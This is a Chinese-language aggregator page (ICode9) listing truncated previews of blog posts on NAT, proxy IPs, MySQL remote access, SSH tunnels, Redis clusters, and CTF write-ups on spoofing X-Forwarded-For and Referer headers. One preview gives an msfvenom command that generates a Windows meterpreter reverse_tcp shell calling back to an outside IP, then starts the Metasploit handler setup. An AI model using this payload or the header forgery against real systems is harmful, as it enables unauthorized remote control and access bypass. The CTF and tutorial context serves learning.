ICode9

转载 https://arthurchiao.art/blog/nat-zh/ NAT - 网络地址转换（2016） 译者序 本文翻译自 2016 年的一篇英文博客 NAT - Network Address Translation 。 由于译者水平有限，本文不免存在遗漏或错误之处。如有疑问，请查阅原文。 以下是译文。 译者序 1 绪论 2 网络内的数据包

获取代理 IP // 需要安装 axios 模块 - npm install axios --save const axios = require('axios') // id secret 等参数是在猿人云官网提取API内获取的 const queries = { id: 'xxx', secret: 'xxx', limit: 1, format: 'txt', auth_mod

防火墙、参数这些就不用说了，最基本的，填错了就当眼瞎了。最重要的是这个：增加允许远程连接 MySQL 用户并授权   很多朋友（包括我）拿到一条命令，好家伙直接欢欢喜喜拿去运行，运行完了一看运行正常，没报错，ok继续验证，发现没用，心想：垃圾东西。各位，好好看看这里的参数： grant all PRIVILEGES

用burpsuite抓包发给重发器 先伪装X-Forworded-For:123.123.123.123 然后又要求来自google 伪装Referer:https://www.google.com    

纯粹自己记录 ，可以给初学者借鉴 目标：机器A往机器B,C,D,E,F上发送命令 操作方法： 1.在机器A 上执行：ssh-keygen 注意：一路 回车下去，不要自定义密钥文件的名称 2.查看A下/root/.ssh下的公钥和私钥           3.在步骤2的基础上执行： ssh-copy-id -i id_rsa.pub root@123.123.

【题目描述】 X老师告诉小宁其实xff和referer是可以伪造的。 【附件】 在线场景 【过程及思路】 打开在线场景后，出现如下提示： 服务器那边要求我们的原始ip是123.123.123.123，我们明显不是这么一个ip，怎么办呢？ 题目告诉我们xff和referer可以伪造，那么什么是xff和referer呢？

一.原理 （一）SSH本地端口转发 将本地机(客户机)的某个端口转发到远端指定机器的指定端口. -L   LocalPort:RemoteHost:RemoteHostPort sshServer A->C   访问被限制 A-B->C  使用B主机作为跳板突破访问限制 实例： 现在我们使用下面这条命令来达成我们的目的(192.168.0.1

X老师告诉小宁其实xff和referer是可以伪造的 百度了一下伪造IP的方法：https://jingyan.baidu.com/article/ca41422fc5fd481eae99ed30.html 添加x-forward-for Header插件，修改IP 然后刷新 还需要伪造响应，使用burpsuit抓包从头来过，在原始中添加 X-Forwarded-For:123.123.123.123

题目来源： Cyberpeace-n3k0 题目描述： X老师告诉小宁其实xff和referer是可以伪造的。 题目场景: 111.200.241.244:56031 题目思路： 本题是考察的HTTP头的伪装修改 X-Forwarded-For:简称XFF头，它代表客户端，也就是HTTP的请求端真实的IP，只有在通过了HTTP 代理或者负载均衡服务器时才

1，xff，全写是X-Forwarded-For，简称xff头，代表http客户端的真实IP。 　　Referer，表示页面的来源。   2，burpsuite抓取页面，发送至repeater，在消息头中添加x-forwarded-for:123.123.123.123 response中提示.innerHTML="必须来自https://www.google.com";    3，在已添加x-forwarded-for:的

msfvenom的shell在windows中的使用 msfvenom生成shell.exe msfvenom -p windows/meterpreter/reverse_tcp lhost=123.123.123.123 lport=2222 -f exe >/root/shell.exe 输入命令： msfconsole metasploit侦听 msf > use exploit/multi/handler #加载模块 msf exploit(mult

分析 题目说明：X老师告诉小宁其实xff和referer是可以伪造。 用Burp Suites伪造X-Forwarded-For和Referer获取flag   GET / HTTP/1.1 Host: xxx.xxx.xx.xx:32032 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:53.0) Gecko/20100101 Firefox/55.0 X-Forwarded-For: 12

一、SSH隧道 在我们计划建立一个本地SSH隧道之前，我们必须清楚下面这些数据： 中间服务器d的IP地址 要访问服务器c的IP地址 要访问服务器c的端口 现在，我们把上面这张图变得具体一些，给这些机器加上IP地址。并且根据下面这张图列出我们的计划：   需要访问234.234.234.234的FTP服务，也

  转： 【精】搭建redis cluster集群，JedisCluster带密码访问【解决当中各种坑】！ 2017年05月09日 00:13:18 冉椿林博客 阅读数：18208 一.搭建redis单机 本文搭建redis3.0版本，3.0主要增加了redis cluster集群功能。   1.下载地址：http://download.redis.io/releases/redis

目录 简介 本地SSH隧道 远程SSH隧道 FAQ 免密码登陆 自动重连 简介 建立ssh隧道常用于, 通过一台公网的主机或者是大家都可以访问的主机做跳转机，来访问内部或者外部不能直接访问的机器. 项目当前用途: 由于服务端上假设架设的redis未设置加密, 因此通过防火墙了屏蔽redis端